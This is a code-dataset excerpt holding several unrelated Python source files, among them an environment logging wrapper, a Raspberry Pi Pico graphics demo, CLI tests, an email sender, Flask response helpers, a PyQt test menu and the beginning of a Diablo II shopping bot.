id (stringlengths 1-265) | text (stringlengths 6-5.19M) | dataset_id (stringclasses, 7 values)
---|---|---|
1610080 | """Environment wrapper class for logging episodes.
This can be used to record data from a subject playing the task. See
../../moog_demos/restore_logged_data.py for an example of how to read log files.
Note: This logger records everything about the environment, which can be a lot
of data (depending on the task). If you plan to use this at scale for recording
subjects' or agents' behavior, we recommend forking this and modifying it to
only log the data that you need to do analyses for your specific task. For
example you may not want to log the positions/velocities of static sprites
(e.g. walls), or may not want to log all the attributes of sprites every
timestep (e.g. if you know that the colors of the sprites don't change in your
task).
"""
import copy
from datetime import datetime
import json
import logging
import numpy as np
import os
import time
from moog import env_wrappers
from moog import sprite
# This is the number of numerals in filenames. Since there is one file per
# episode, you should pick _FILENAME_ZFILL large enough that the number of
# episodes in your dataset is less than 10^_FILENAME_ZFILL.
_FILENAME_ZFILL = 5
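# Illustrative example (added for clarity, not part of the original module):
# with _FILENAME_ZFILL = 5, episode counts are zero-padded like so:
#   str(7).zfill(5)     -> '00007'
#   str(12345).zfill(5) -> '12345'
# so up to 10^5 episodes keep lexicographically sortable filenames.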
class VertexLogging():
NEVER = 'NEVER'
ALWAYS = 'ALWAYS'
WHEN_NECESSARY = 'WHEN_NECESSARY'
def _serialize(x):
"""Serialize a value x.
This is used to serialize sprite attributes, actions, and meta_state so that
they are json-writable.
Specifically, numpy arrays are not JSON serializable, so we must convert
numpy arrays to lists. This function is recursive to handle nestings inside
of lists/tuples/dictionaries.
Args:
x: Value to serialize.
Returns:
Serialized value that can be JSON dumped.
"""
if isinstance(x, np.ndarray):
return x.tolist()
elif isinstance(x, (np.float32, np.float64)):
return float(x)
elif isinstance(x, (np.int32, np.int64)):
return int(x)
elif isinstance(x, list):
return [_serialize(a) for a in x]
elif isinstance(x, tuple):
return tuple(_serialize(a) for a in x)
elif isinstance(x, dict):
return {k: _serialize(v) for k, v in x.items()}
else:
return x
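# Illustrative sketch (added; not in the original file): _serialize makes
# nested sprite attributes JSON-writable, e.g.
#   _serialize({'position': np.array([0.1, 0.2]), 'id': np.int64(3)})
#   -> {'position': [0.1, 0.2], 'id': 3}
# after which json.dumps(...) succeeds.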
class LoggingEnvironment(env_wrappers.AbstractEnvironmentWrapper):
"""Environment class for logging timesteps.
This logger produces a description of the log in 'description.txt' of
log_dir, so please refer to that for a detailed account of the structure of
the logs.
"""
def __init__(self, environment, log_dir='logs',
log_vertices='WHEN_NECESSARY'):
"""Constructor.
Args:
environment: Instance of ../moog/environment.Environment.
log_dir: String. Log directory relative to working directory.
log_vertices: String. Of the following options:
* 'NEVER'. In this case, never log sprite vertices.
* 'WHEN_NECESSARY'. In this case, log sprite vertices when a
sprite has either just appeared or just changed shape. In
this way, the vertices of a sprite can always be inferred
from the current position/angle/aspect_ratio and the
vertices that were logged for that sprite (identifiable by
its id) the last time its vertices were logged.
* 'ALWAYS'. Log vertices for all sprites every timestep.
"""
super(LoggingEnvironment, self).__init__(environment)
# Make sure log_vertices is a valid value
if not hasattr(VertexLogging, log_vertices):
raise ValueError('log_vertices is {} but must be in VertexLogging '
'values'.format(log_vertices))
self._log_vertices = log_vertices
# Set the logging directory
now_str = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
if log_dir[0] == '/':
log_dir = os.path.join(log_dir, now_str)
else:
log_dir = os.path.join(os.getcwd(), log_dir, now_str)
os.makedirs(log_dir)
self._log_dir = log_dir
# These are the attributes that we'll log
self._attributes = list(sprite.Sprite.FACTOR_NAMES) + ['id']
# Log attribute list
attributes_filename = os.path.join(self._log_dir, 'attributes.txt')
logging.info('Logging attribute list {} to {}.'.format(
self._attributes, attributes_filename))
with open(attributes_filename, 'w') as f:
json.dump(self._attributes, f)
# Log description
self._log_description()
# Initialize self._episode_log
self._episode_count = 0
self._episode_log = []
def _log_description(self):
"""Log a description of the data to a description.txt file."""
description_filename = os.path.join(self._log_dir, 'description.txt')
logging.info('Logging description to {}.'.format(description_filename))
description = (
'Each numerical file in this directory is an episode of the task. '
'Each such file contains a json-serialized list, each element of '
'which represents an environment step in the episode. Each step is '
'a list of four elements, [[`time`, time], [`reward`, reward], '
'[`step_type`, step_type], [`action`, action], [`meta_state`, '
'meta_state`], state].'
'\n\n'
'\n\n'
'time is a timestamp of the timestep.'
'\n\n'
'\n\n'
'reward contains the value of the reward at that step.'
'\n\n'
'\n\n'
'step_type indicates the dm_env.StepType of that step, i.e. '
'whether it was first, mid, or last.'
'\n\n'
'\n\n'
'action contains the agent action for the step.'
'\n\n'
'\n\n'
'meta_state is the serialized meta_state of the environment.'
'\n\n'
'\n\n'
'state is a list, each element of which represents a layer in the '
'environment state. The layer is represented as a list [k, [], [], '
'[], ...], where k is the layer name and the subsequent elements '
'are serialized sprites. Each serialized sprite is a list of '
'attributes. See attributes.txt for the attributes contained.'
)
if self._log_vertices == VertexLogging.ALWAYS:
description += (
' Furthermore, a list of vertices is appended to the attribute '
'list for each serialized sprite.'
)
elif self._log_vertices == VertexLogging.WHEN_NECESSARY:
description += (
'\n\n'
'\n\n'
'Furthermore, a list of vertices is appended to the attribute '
'list for a serialized sprite for the first timestep in which that '
'serialized sprite appears, or when the sprite has changed '
'shape.'
)
with open(description_filename, 'w') as f:
f.write(description)
def _serialize_sprite(self, s):
"""Serialize a sprite as a list of attributes."""
attributes = [_serialize(getattr(s, x)) for x in self._attributes]
if (self._log_vertices == VertexLogging.ALWAYS or
(self._log_vertices == VertexLogging.WHEN_NECESSARY and
s.just_set_shape)):
attributes.append(s.vertices.tolist())
s.just_set_shape = False
return attributes
def _serialized_state(self):
"""Serialized a state."""
serialized_state = [
[k, [self._serialize_sprite(s) for s in self.state[k]]]
for k in self.state
]
return serialized_state
def step(self, action):
"""Step the environment with an action, logging timesteps."""
timestep = self._environment.step(action)
str_timestep = (
[['time', time.time()],
['reward', timestep.reward],
['step_type', timestep.step_type.value],
['action', _serialize(action)],
['meta_state', _serialize(self._environment.meta_state)],
self._serialized_state()]
)
self._episode_log.append(str_timestep)
if timestep.last():
# Write the episode to a log file
episode_count_str = str(self._episode_count).zfill(_FILENAME_ZFILL)
filename = os.path.join(self._log_dir, episode_count_str)
logging.info('Logging episode {} to {}.'.format(
self._episode_count, filename))
with open(filename, 'w') as f:
json.dump(self._episode_log, f)
self._episode_count += 1
self._episode_log = []
return timestep
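# Minimal usage sketch (added for illustration; assumes an existing
# `environment` instance of ../moog/environment.Environment and an `action`
# appropriate for the task -- both are placeholders, not defined here):
#
#   env = LoggingEnvironment(environment, log_dir='logs')
#   timestep = env.step(action)  # each episode is written to its own file on its last step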
| StarcoderdataPython |
93701 | import os
serenityff_C6 = os.path.dirname(__file__) + "/C6/"
serenityff_C12 = os.path.dirname(__file__) + "/C12/"
| StarcoderdataPython |
3256401 | <filename>src/pico_code/pico/explorer-base/ExplorerWorkout2.py
# Physical Computing with Graphics on Pico Explorer
# <NAME> 30th Jan 2021
# 10K Ohm potentiometer on ADC0
# LED with 470 Ohm resistor on GP4
import picoexplorer as display
import utime, random, math
import machine
from machine import Pin
width = display.get_width()
height = display.get_height()
display_buffer = bytearray(width * height * 2)
display.init(display_buffer)
led = Pin(4, Pin.IN,Pin.PULL_DOWN)
# Set the backlight to 30%
# display.set_backlight(0.3)
def blk():
display.set_pen(0,0,0)
display.clear()
display.update()
def title(msg,r,g,b):
blk()
display.set_pen(r,g,b)
display.text(msg, 20, 70, 200, 4)
display.update()
utime.sleep(2)
blk()
def horiz(l,t,r): # left, right, top
n = r-l+1 # Horizontal line
for i in range(n):
display.pixel(l + i, t)
def vert(l,t,b): # left, top, bottom
n = b-t+1 # Vertical line
for i in range(n):
display.pixel(l, t+i)
def box(l,t,r,b): # left, top, right, bottom
horiz(l,t,r) # Hollow rectangle
horiz(l,b,r)
vert(l,t,b)
vert(r,t,b)
def line(x,y,xx,yy): # (x,y) to (xx,yy)
if x > xx:
t = x # Swap co-ordinates if necessary
x = xx
xx = t
t = y
y = yy
yy = t
if xx-x == 0: # Avoid div by zero if vertical
vert(x,min(y,yy),max(y,yy))
else: # Draw line one dot at a time L to R
n=xx-x+1
grad = float((yy-y)/(xx-x)) # Calculate gradient
for i in range(n):
y3 = y + int(grad * i)
display.pixel(x+i,y3) # One dot at a time
def show(tt):
display.update()
utime.sleep(tt)
def align(n, max_chars):
# Aligns string of n in max_chars
msg1 = str(n)
space = max_chars - len(msg1)
msg2 = ""
for m in range(space):
msg2 = msg2 +" "
msg2 = msg2 + msg1
return msg2 # String - ready for display
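# Example (added): align(7, 4) returns "   7", right-aligning the value in a
# 4-character field so columns of readings line up on the display.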
def ring(cx,cy,rr): # Centre and radius
display.circle(cx,cy,rr)
display.set_pen(0,0,0) # background colour
display.circle(cx,cy,rr-1)
def ring2(cx,cy,r): # Centre (x,y), radius
for angle in range(0, 90, 2): # 0 to 90 degrees in 2s
y3=int(r*math.sin(math.radians(angle)))
x3=int(r*math.cos(math.radians(angle)))
display.pixel(cx-x3,cy+y3) # 4 quadrants
display.pixel(cx-x3,cy-y3)
display.pixel(cx+x3,cy+y3)
display.pixel(cx+x3,cy-y3)
def showgraph(v): # Bar graph
display.set_pen(255,0,0)
display.text("V", 8, 50, 240, 3)
display.set_pen(0,0,0) # Blank old bar graph
display.rectangle(29, 50, 220, 16)
display.set_pen(200,200,0) # New bar graph
display.rectangle(29, 50, v, 15)
display.set_pen(255,255,255) # Base line zero
vert(28, 46, 68)
display.set_pen(0,0,255) # percentage
display.text(str(align(v,4)) + " %", 140, 48, 240, 3)
# Define special 5x8 characters - 8 bytes each - 0...7
# Bytes top to bottom, 5 least significant bits only
smiley = [0x00,0x0A,0x00,0x04,0x11,0x0E,0x00,0x00]
sad = [0x00,0x0A,0x00,0x04,0x00,0x0E,0x11,0x00]
heart = [0,0,0,10,31,14,4,0]
b_heart = [0,10,31,0,0,14,4,0]
up_arrow =[0,4,14,21,4,4,0,0]
down_arrow = [0,4,4,21,14,4,0,0]
bits = [128,64,32,16,8,4,2,1] # Powers of 2
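# Illustrative decode (added): row 1 of `smiley` is 0x0A = 0b01010, so its two
# set bits become the two "eye" pixels; `pattern[line] & bits[i]` below tests
# one of the 5 low-order bits per row in exactly this way.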
def mychar2(xpos, ypos, pattern): # Print defined character
for line in range(8): # 5x8 characters
for ii in range(5): # Low value bits only
i = ii + 3
dot = pattern[line] & bits[i] # Extract bit
if dot: # Only print WHITE dots
display.pixel(xpos+i*2, ypos+line*2)
display.pixel(xpos+i*2, ypos+line*2+1)
display.pixel(xpos+i*2+1, ypos+line*2)
display.pixel(xpos+i*2+1, ypos+line*2+1)
def mychar3(xpos, ypos, pattern): # Print defined character
for line in range(8): # 5x8 characters
for ii in range(5): # Low value bits only
i = ii + 3
dot = pattern[line] & bits[i] # Extract bit
if dot: # Only print WHITE dots
display.pixel(xpos+i*3, ypos+line*3)
display.pixel(xpos+i*3, ypos+line*3+1)
display.pixel(xpos+i*3, ypos+line*3+2)
display.pixel(xpos+i*3+1, ypos+line*3)
display.pixel(xpos+i*3+1, ypos+line*3+1)
display.pixel(xpos+i*3+1, ypos+line*3+2)
display.pixel(xpos+i*3+2, ypos+line*3)
display.pixel(xpos+i*3+2, ypos+line*3+1)
display.pixel(xpos+i*3+2, ypos+line*3+2)
# ==== Main ====
title("Pimoroni Pico Explorer Workout",200,200,0)
# === Basics ===
title("Basics",200,0,0)
display.set_pen(255,255,0)
line(10,10,100,100)
show(0.25)
display.set_pen(255,0,255)
line(10,100,100,10)
show(0.25)
display.set_pen(0,255,255)
box(0,105,100,205)
show(0.25)
display.set_pen(255,0,0)
ring(160,50,50)
show(0.25)
display.set_pen(0,0,255)
ring2(160,160,50)
show(0.25)
display.text("<NAME>", 15, 220, 240, 3)
display.update()
mychar2(20, 130, up_arrow) # Defined characters
mychar2(40, 130, smiley)
mychar2(60, 130, heart)
mychar2(20, 160, down_arrow)
mychar2(40, 160, sad)
mychar2(60, 160, b_heart)
mychar3(120, 130, up_arrow) # Bigger
mychar3(140, 130, smiley)
mychar3(160, 130, heart)
mychar3(120, 160, down_arrow)
mychar3(140, 160, sad)
mychar3(160, 160, b_heart)
show(3)
# Character Set - No lower case!
title("Character set",200,200,0)
display.set_pen(0,200,0)
display.text("Character Set", 15, 15, 200, 2)
s = ""
count = 0
for i in range(32,128,8):
for j in range(0,8,1):
p = i + j
if ((p < 97) or (p>122)):
s = s + chr(p)
count = count + 1
if (count)/16 == int((count)/16):
s = s +" " # 'space' for text wrap
print(s)
display.set_pen(200,200,0)
display.text(s, 15, 40, 200, 2)
display.set_pen(0,0,200)
display.text("No lower case", 140, 110, 200, 1)
display.set_pen(200,0,0)
display.text("Size 3", 15, 130, 200, 3)
display.set_pen(0,0,200)
display.text("Size 4", 15, 156, 200, 4)
display.set_pen(0,200,0)
display.text("Size 6", 15, 190, 200, 6)
display.update()
utime.sleep(5)
# Lines demo
title("lines",200,0,0)
for step in range(18, 2, -5):
blk()
display.set_pen(0,0,0)
display.clear()
red = random.randint(0, 255)
green = random.randint(0, 255)
blue =random.randint(0, 255)
display.set_pen(red, green, blue)
x = 0 # Block 1
y = 0
x2 = 239
for y2 in range(0,240, step):
line(x, y, x2, y2)
display.update()
x = 0 # Block 2
y = 239
x2 = 239
for y2 in range(239,-1,-step):
line(x, y, x2, y2)
display.update()
x = 239 # Block 3
y = 0
x2 = 0
for y2 in range(0,240, step):
line(x, y, x2, y2)
display.update()
x = 239 # Block 4
y = 239
x2 = 0
for y2 in range(239,-1,-step):
line(x, y, x2, y2)
display.update()
utime.sleep(0.5)
# === Sin & Cos graphs ====
title("Drawing graphs",0,200,0)
factor = 361 /240
#sine = []
display.set_pen(80,80,80)
horiz(0,60,239)
display.update()
display.set_pen(200,0,0)
for x in range(0,240):
y = int ((math.sin(math.radians(x * factor)))* -50) + 60
# sine.append(y)
display.pixel(x,y)
display.update()
display.text("Sine", 40, 70, 200, 2)
display.update()
display.set_pen(80,80,80)
horiz(0,180,239)
display.update()
display.set_pen(0,200,0)
for x in range(0,240):
y = int((math.cos(math.radians(x * factor)))* -50) + 180
display.pixel(x,y)
display.text("Cosine", 90, 160, 200, 2)
display.update()
utime.sleep(3)
title("Text on a path",0,0,200)
# Text on a downward slant
display.set_pen(255,0,0)
msg =" Pimoroni pico explorer"
b = bytes(msg, 'utf-8')
for i in range(len(b)):
c = b[i]
display.character(c, i*10,i*5 +110,2)
display.update()
# Text on a Sin wave
factor = 361 /240
display.set_pen(0,255,0)
for i in range(len(b)):
y = int ((math.sin(math.radians(i*10 * factor)))* -50) + 60
c = b[i]
display.character(c, i*10,y +10,2)
display.update()
utime.sleep(3)
title("Scrolling text on a Sine Curve",0,0,200)
# Scrolling on a Sine curve
# Modified from a method by <NAME> for a SSD1306
msg = 'Scrolling text on a sine curve using a pico explorer!'
f_width = 13 # Font width in pixels
f_height = 10 # Font Height in pixels
amp = 100 # Amplitude of sin wave
freq = 1 # Screen cycles (360 degrees)
pos = width # X position of the first character in the msg.
msg_len_px = len(msg) * f_width # Pixel width of the msg.
# Extra wide lookup table - calculate once to speed things up
y_table = [0] * (width+f_width) # 1 character extra
for i in range(len(y_table)):
p = i / (width-1) # Compute current position along
# lookup table in 0 to 1 range.
# Get y co-ordinate from table
y_table[i] = int(((amp/2.0) * math.sin(2.0*math.pi*freq*p)) + (amp/2.0))
# Scrolling loop:
blk()
running = True
while running:
# Clear scroll area
display.set_pen(0,0,0)
display.rectangle(0, 50, 240, 200)
display.set_pen(200,200,0)
# Start again if msg finished
pos -= 1
if pos <= -msg_len_px:
pos = width
# Go through each character in the msg.
for i in range(len(msg)):
char = msg[i]
char_x = pos + (i * f_width) # Character's X position on the screen.
if -f_width <= char_x < width:
# If character is visible, draw it.
display.text(char, char_x + 5, y_table[char_x+f_width]+60,2)
display.set_pen(100,100,100)
display.text("Press button Y to halt", 5, 215, 230, 2)
display.update()
if display.is_pressed(3): # Y button is pressed ?
running = False
utime.sleep(0.01)
blk()
# Physical Computing: Potentiometer, LED PWM and Bar Graph
potentiometer = machine.ADC(26) # 10K Ohm pot on ADC0
led = machine.PWM(machine.Pin(4)) # LED with 470 Ohm resistor on GP4
led.freq(1000)
led.duty_u16(0) # Switch LED OFF
title("Physical computing with graphics",0,0,200)
running = True
display.set_pen(255,255,255)
display.text("Turn Potentiometer", 20, 15, 230, 2)
display.set_pen(100,100,100)
display.text("Press button Y to halt", 5, 215, 230, 2)
display.set_pen(0,100,0)
box(60,80,180,200)
while running:
pot_raw = potentiometer.read_u16()
pot = pot_raw/256
# Adjust end values: 0 & 255
pot = int(pot * 256.0 /255.0) - 1
if pot > 255:
pot = 255
# print(pot) # Check pot's range is 0 -> 255 inclusive
percent = int(100 * pot / 255)
showgraph(percent)
display.update()
duty = pot_raw - 300 # duty must not go negative
if duty < 0 :
duty = 0
led.duty_u16(duty)
display.set_pen(pot,pot,pot) # grey to white
display.circle(120,140,50)
if display.is_pressed(3): # Y button is pressed ?
running = False
# Tidy up
led.duty_u16(0) # LED off
led = Pin(4, Pin.IN, Pin.PULL_DOWN) # Normal state
blk()
display.set_pen(200,0,0)
display.text("All Done!", 55, 140, 200, 3)
display.update()
utime.sleep(2)
blk()
| StarcoderdataPython |
40308 | import frappe
def after_migrate():
set_default_otp_template()
def set_default_otp_template():
if not frappe.db.get_value("System Settings", None, "email_otp_template"):
if frappe.db.exists("Email Template", "Default Email OTP Template"):
# should exists via fixtures
frappe.db.set_value("System Settings", None, "email_otp_template", "Default Email OTP Template")
if not frappe.db.get_value("System Settings", None, "sms_otp_template"):
if frappe.db.exists("SMS Template", "Default SMS OTP Template"):
# should exists via fixtures
frappe.db.set_value("System Settings", None, "sms_otp_template", "Default SMS OTP Template")
| StarcoderdataPython |
3353888 | <gh_stars>1-10
import copy
import pytest
from tempocli.cli import cli
from tempocli.cli import ENVVAR_PREFIX
from tests.helpers import write_yaml
def test_tempocli(cli_runner):
result = cli_runner.invoke(cli)
assert result.exit_code == 0
assert 'Usage:' in result.output
@pytest.mark.freeze_time('2018-08-05')
class TestTempoCliCreate(object):
data = {
'author_account_id': 'foo',
'issues': [
{
'issue': 'INT-8',
'time_spent': '30m',
'start_time': '09:30:00',
},
],
}
@pytest.fixture
def template_data(self):
return copy.deepcopy(self.data)
@pytest.fixture
def template(self, tmpdir):
return tmpdir.join('template.yml')
@pytest.fixture
def template_invoke(self, cli_invoke, config, template):
_args = [
'-vvv',
'--config',
config.strpath,
'create',
'--template',
template.strpath,
]
def func(args=None, **kwargs):
_args.extend(args or [])
return cli_invoke(cli, _args, **kwargs)
return func
def test_create_single(self, template, template_data, template_invoke, tempo_request):
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.called_once
assert request.last_request.json() == {
'authorAccountId': 'foo',
'issueKey': self.data['issues'][0]['issue'],
'timeSpentSeconds': 1800,
'startDate': '2018-08-05',
'startTime': self.data['issues'][0]['start_time'],
'description': 'Working on issue {}'.format(self.data['issues'][0]['issue']),
}
def test_create_multiple(self, template, template_data, template_invoke, tempo_request):
template_data['issues'].append({
'issue': 'INT-10',
'time_spent': '30m',
'start_time': '09:30:00',
})
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.call_count == 2
def test_create_author_override(self, template, template_data, template_invoke, tempo_request):
template_data['issues'][0]['author_account_id'] = 'bar'
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.called_once
assert request.last_request.json()['authorAccountId'] == template_data['issues'][0]['author_account_id']
def test_create_extras_override(self, template, template_data, template_invoke, tempo_request):
template_data['issues'][0]['extras'] = {
'authorAccountId': 'bar',
}
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.called_once
assert request.last_request.json()['authorAccountId'] == template_data['issues'][0]['extras']['authorAccountId']
def test_create_token_from_env(self, template, template_data, template_invoke, tempo_request):
token = '<PASSWORD>' # noqa: S105
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke(
env={
'{}_TOKEN'.format(ENVVAR_PREFIX): token,
},
)
assert result.exit_code == 0
assert request.called_once
assert request.last_request.headers['Authorization'] == 'Bearer {}'.format(token)
def test_create_future_date(self, template, template_data, template_invoke, tempo_request):
template_data['issues'][0]['start_time'] = 'Monday at 11am'
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.called_once
assert request.last_request.json()['startDate'] == '2018-08-06'
assert request.last_request.json()['startTime'] == '11:00:00'
def test_create_http_error(self, template, template_data, template_invoke, tempo_request):
write_yaml(template, template_data)
request = tempo_request.post('/worklogs', status_code=500)
result = template_invoke()
assert "Could not create ('foo', 'INT-8'," in result.output
assert 'Traceback' in result.output
assert result.exit_code == 1
assert request.called_once
| StarcoderdataPython |
15917 | from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.header import Header
from email.mime.base import MIMEBase
from email import encoders
import os
import uuid
import smtplib
import re
class CTEmail(object):
def __init__(self, usr, pwd, server='smtp.qq.com', port=25, hide=True):
self.user = usr
self.password = <PASSWORD>
self.server = server
self.port = port
self.hide = hide
self.pattern_img = r'(<EMAIL_IMG>.+</EMAIL_IMG>)'
def attach_image(self, img_dict):
"""
Attach image to use it in HTML mail body
:param img_dict:
:return: MIMEImage attachment
"""
with open(img_dict['path'], 'rb') as file:
msg_image = MIMEImage(file.read(), name=os.path.basename(img_dict['path']))
msg_image.add_header('Content-ID', '<{}>'.format(img_dict['cid']))
return msg_image
def attach_file(self, filename):
"""
Attach file to mail letter
:param filename: str
:return: MIMEBase attachment
"""
part = MIMEBase('application', 'octet-stream')
data = open(filename, 'rb').read()
part.set_payload(data)
encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename=%s' % os.path.basename(filename))
return part
def prepare_email(self, subject, recipients, content, images):
"""
Prepare mail body with attachments.
Basically this function form message.
:param subject: str
:param recipients: list
:param content: str
:param images: list
:return: message object
"""
msg = MIMEMultipart('related')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = self.user
if self.hide:
msg['bcc'] = 'undisclosed-recipients'
else:
msg['to'] = ','.join(recipients)
msg_alternative = MIMEMultipart('alternative')
img_list = []
if images:
index = 0
for image in images:
image = dict(title='Image {0}'.format(index), path=image, cid=str(uuid.uuid4()))
img_html = '<div dir="ltr"><img src="cid:{cid}" ' \
'alt="Image should appear here...but this did not happened (" ' \
'style="display: block; color: #666666; ' \
'font-family: Helvetica, arial, sans-serif; font-size: 16px;" ' \
'class="img-max"></div>'.format(cid=image['cid'])
content = re.sub(self.pattern_img, img_html, content, 1)
img_list.append(image)
index += 1
msg_html = MIMEText(content, 'html', 'utf-8')
msg_alternative.attach(msg_html)
msg.attach(msg_alternative)
# the sequence of images attachment matters, so need twice check
if img_list:
for img in img_list:
msg.attach(self.attach_image(img))
return msg
def send_email(self, subject, content_path, recipients):
"""
This function send email to the list of recipients.
Images are automatically added if content_path is directory
(assumed that this directory contains html+images)
:param subject: str
:param content_path: str
:param recipients: list
:return: None
"""
if os.path.exists(content_path):
if os.path.isdir(content_path):
files = sorted(os.listdir(content_path))
images = []
for file in files:
path = os.path.join(content_path, file)
if file.endswith('.html'):
content = open(path, 'r').read()
elif file.endswith('.jpg') or file.endswith('.jpeg') or file.endswith('.png'):
images.append(path)
elif os.path.isfile(content_path):
content = open(content_path, 'r', encoding='utf-8').read()
msg = self.prepare_email(subject, recipients, content, images)
mailServer = smtplib.SMTP(self.server, self.port)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(self.user, self.password)
mailServer.sendmail(self.user, recipients, msg.as_string())
mailServer.quit() | StarcoderdataPython |
112306 | <filename>common/responses.py<gh_stars>0
from flask import jsonify
import common.logger as log
def respondInternalServerError(message='Internal server error', error=None):
'''Returns an object which flask will parse and transform into a 500 response'''
log.info('Responding internal server error')
log.info('*'.center(20, '-'))
if error is not None:
print(error)
return (jsonify({
'code': 500,
'message': message
}), 500)
def respondBadRequest(message='Invalid data sent'):
'''Returns an object which flask will parse and transform into a 400 response'''
log.info('Responding bad request')
log.info('*'.center(20, '-'))
return (jsonify({
'code': 400,
'message': message
}), 400)
def respondUnauthorized(message):
'''Returns an object which flask will parse and transform into a 401 response'''
log.info('Responding unauthorized')
log.info('*'.center(20, '-'))
return (jsonify({
'code': 401,
'message': message
}), 401)
def respondCreated(data):
'''Returns an object which flask will parse and transform into a 201 response'''
log.info('Responding created')
log.info('*'.center(20, '-'))
return (jsonify(data), 201)
def respondOk(data):
'''Returns an object which flask will parse and transform into a 200 response'''
log.info('Responding OK')
log.info('*'.center(20, '-'))
return (jsonify({
'code': 200,
'message': data
}), 200)
def respondWithData(data):
'''Returns an object which flask will parse and transform into a 200 response
. This response json will be of the form
{
'code': 200,
'key_1': 'value_1',
'key_n': 'value_n'
}
'''
log.info('Responding with data')
log.info('*'.center(20, '-'))
t = {'code': 200}
data = {**t, **data}
return (jsonify(data), 200)
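# Usage sketch (added for illustration; the route and Flask `app` object are
# hypothetical -- this module only builds the response tuples):
#   @app.route('/ping')
#   def ping():
#       return respondWithData({'status': 'alive'})
#   # -> JSON body {"code": 200, "status": "alive"} with HTTP 200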
| StarcoderdataPython |
3293004 | <reponame>Juan-Manuel-Diaz/UniNeuroLab<filename>GUI/Menu_principal.py
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from PyQt5.QtWidgets import (QApplication, QMainWindow, QVBoxLayout, QMenu,
QLabel, QLineEdit, QPushButton, QWidget, QAction)
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont
import sys
import Interfaz_trazo_A
import Interfaz_trazo_B
class Login(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle("Login de credenciales")
self.credenciales()
def credenciales(self):
centralwidget = QWidget()
self.setCentralWidget(centralwidget)
layout = QVBoxLayout(centralwidget)
Bienvenida_lbl = QLabel("Bienvenidos a UniNeuroLab.\n \
Favor de iniciar sesión para poder guardar sus estudios correctamente")
Bienvenida_lbl.setAlignment(Qt.AlignCenter)
user_input1 = QLineEdit()
user_input1.setPlaceholderText("Nombre")
user_input1.setClearButtonEnabled(True)
user_input2 = QLineEdit()
user_input2.setPlaceholderText("Apellido")
user_input2.setClearButtonEnabled(True)
user_input3 = QLineEdit()
user_input3.setPlaceholderText("DNI")
user_input3.setClearButtonEnabled(True)
btn1 = QPushButton("Iniciar sesión")
btn1.clicked.connect(lambda: self.user(
user_input1.text(), user_input2.text()))
btn2 = QPushButton("Entrar como anónimo")
btn2.clicked.connect(self.Anon_User)
layout.addWidget(Bienvenida_lbl)
layout.addWidget(user_input1)
layout.addWidget(user_input2)
layout.addWidget(user_input3)
layout.addWidget(btn1)
layout.addWidget(btn2)
self.setLayout(layout)
self.show()
def Anon_User(self):
self.main_menu = MainMenu()
self.main_menu.show()
self.close()
def user(self, nombre, apellido):
self.name = "{}, {}".format(apellido, nombre)
self.main_menu = MainMenu(self.name)
self.main_menu.show()
self.close()
class MainMenu(QMainWindow):
def __init__(self, name=None):
super().__init__()
self.setWindowTitle("UniNeuroLab - Menú Principal")
self.setGeometry(100, 100, 800, 600)
if name is None:
self.name = "Anónimo/a"
else:
self.name = name
self.UI()
def UI(self):
centralwidget = QWidget()
self.setCentralWidget(centralwidget)
layout = QVBoxLayout(centralwidget)
lbl1 = QLabel(
"Bienvenido a UniNeuroLab {}.\n Disfrute su visita".format(self.name))
lbl1.setFont(QFont('Arial', 25))
lbl1.setAlignment(Qt.AlignCenter)
test_trazo = QMenu("&Test del trazo", self)
test_trazo.setStatusTip('Test del trazo que consiste en')
test_trazo_a = QAction('Test del trazo &A', self)
test_trazo_b = QAction('Test del trazo &B', self)
test_trazo_a.triggered.connect(lambda: self.interfaz_trazo_a(self.name))
test_trazo_b.triggered.connect(lambda: self.interfaz_trazo_b(self.name))
test_trazo.addAction(test_trazo_a)
test_trazo.addAction(test_trazo_b)
menubar = self.menuBar()
testMenu = menubar.addMenu('&Tests')
testMenu.addMenu(test_trazo)
layout.addWidget(lbl1)
self.setLayout(layout)
def interfaz_trazo_a(self, name=None):
test = Interfaz_trazo_A.MyWindow()
test.show()
def interfaz_trazo_b(self, name=None):
test = Interfaz_trazo_B.MyWindow()
test.show()
if (__name__ == '__main__'):
app = QApplication(sys.argv)
win0 = Login() # Create the main login window
win0.show()
sys.exit(app.exec())
| StarcoderdataPython |
3380316 | from controller.acoController import AcoController
def main():
controller = AcoController()
controller.solve()
return
if __name__ == '__main__':
try:
print('\n\t-- ACO Router --\n')
main()
print('\n----------------------------------\n')
except Exception as err:
print('- Runtime error: ', err)
| StarcoderdataPython |
3204953 | from shop.shopper_base import ShopperBase
import datetime
import os
import time
import math
import random
from typing import Dict, Tuple, Union, List, Callable
import keyboard
import numpy as np
from screen import convert_screen_to_monitor, grab, convert_abs_to_monitor, convert_screen_to_abs, convert_monitor_to_screen
from config import Config
from logger import Logger
from npc_manager import Npc, open_npc_menu, press_npc_btn
from template_finder import TemplateFinder
from utils.custom_mouse import mouse
from utils.misc import wait
def exit(run_obj):
run_time = str(datetime.timedelta(seconds=round(time.time() - run_obj.start_time)))
Logger.info("Exiting shopping mall...")
print(
"STATS \truns \t\ttime \titems_evaluated \titems_bought\n"
f"\t{run_obj.run_count} \t\t{run_time}"
f"\t\t{run_obj.items_evaluated} \t\t\t{run_obj.items_bought}"
)
os._exit(0)
class DrognanShopper(ShopperBase):
"""
Shop at Drognan for Items.
Currently supported: Hammerdin scepters
In order to start the shopping bot:
1.) Run this this file in Python.
2.) Be ingame in Lut Golein (Act 2 town)
3.) Stand close to Drognan and the town exit (must be top right layout)
